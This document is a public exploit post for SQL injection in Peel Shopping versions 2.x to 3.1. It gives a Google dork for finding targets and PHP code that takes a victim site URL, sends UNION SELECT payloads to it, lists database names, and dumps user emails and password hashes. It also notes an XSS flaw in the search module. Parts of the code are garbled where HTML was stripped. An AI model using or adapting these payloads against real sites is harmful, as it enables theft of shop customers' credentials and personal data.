Peel Shopping 2.x < 3.1 "catid=" SQL injection

# Exploit Title: Peel Shopping "catid=" SQL injection # Google Dork: inurl:/lire/index.php?rubid= # Date: 2024-10-02 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://www.peel-shopping.com/ # Software Link: https://github.com/advisto/peel-shopping # Version: 2.x < 3.1 # Tested on: Windows 10 ## USAGE: ## ## 1 ## ##If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ## ## 2 ## ##If you want test this single parameter index.php?catid= leave the field with default.## ## 3 ## ##If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3) ## ## Details: ## ##You can also test the search module affected by XSS. ## ##If you see many iframes are the switch of the tables or parameters;carefully use the ## ##characters '/' in the full path and '-' before the numericals vars. ## ######################################################################################### ######################################################################################### ***************************************************************************************** [code] Multiple Vulnerabilities exploit [tested] Peel Shopping 2.x < 3.1 "catid=" SQL injection

#################################
#Peel Shopping 2.x < 3.1 Exploit#
#vuln finder!                   #
#Code by Emiliano Febbi - 2024  #
#################################
( first get db name and later run exploit )

#Expl-1

1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=

'; if($_POST['victim_site']) { $site = $_POST['victim_site']; print "#DB_Name:(try-1)
"; $gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--"); $tags=explode('',$gettt); $tags=explode("",$tags[1]); $cleaning = array( "performance_schema", "information_schema", "Accueil", "Vous", "ici", "tes", ); $ok = ""; $filtred = str_replace($cleaning, $ok, $tags[0]); var_dump(strip_tags($filtred)); print "

"; print "#DB_Name:(try-2)
"; $gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--"); $tagss=explode('information_schema
',$gettts); $tagss=explode('" href=',$tagss[1]); $filtreds = str_replace($cleaning, $ok, $tagss[0]); var_dump(strip_tags($filtreds)); };; /*#exploit*/ if($_POST['victim_sitee'] and $_POST['victim_db']) { $sitee = $_POST['victim_sitee']; $hack_db = $_POST['victim_db']; ?> 1- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> id=&catid=

###########################################################
2- #ALL @E-Mail and Users: ~table ->utilisateurs-> id=&catid=

3- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> catid=
[emails cracked]+md5:
"; $textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--"); $ress = preg_match_all( "/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i", $textt, $matchess ); if ($ress) { foreach(array_unique($matchess[0]) as $emails) { echo $emails . "
"; } } else { echo "No emails found."; } };;; /*#exploit*/ echo '

#Expl-3

'; if($_POST['hack2']) { $hackk = $_POST['hack2']; echo '
###########################################################
'; echo "2 [#Query interested] -> index.php?rubid=
#password1:(try-1)
"; ?>
#password2:(try-2)

#password3:(try-3)

#password4:(try-4)

[emails cracked]:
"; $text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--"); $res = preg_match_all( "/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i", $text, $matches ); if ($res) { foreach(array_unique($matches[0]) as $email) { echo $email . "
"; } } else { echo "No emails found."; } };;;;; /*#exploit*/ if($_POST['site_XSS']) { $XSS = $_POST['site_XSS']; ?>
[/code]

#Expl-1

#Expl-2

#Expl-3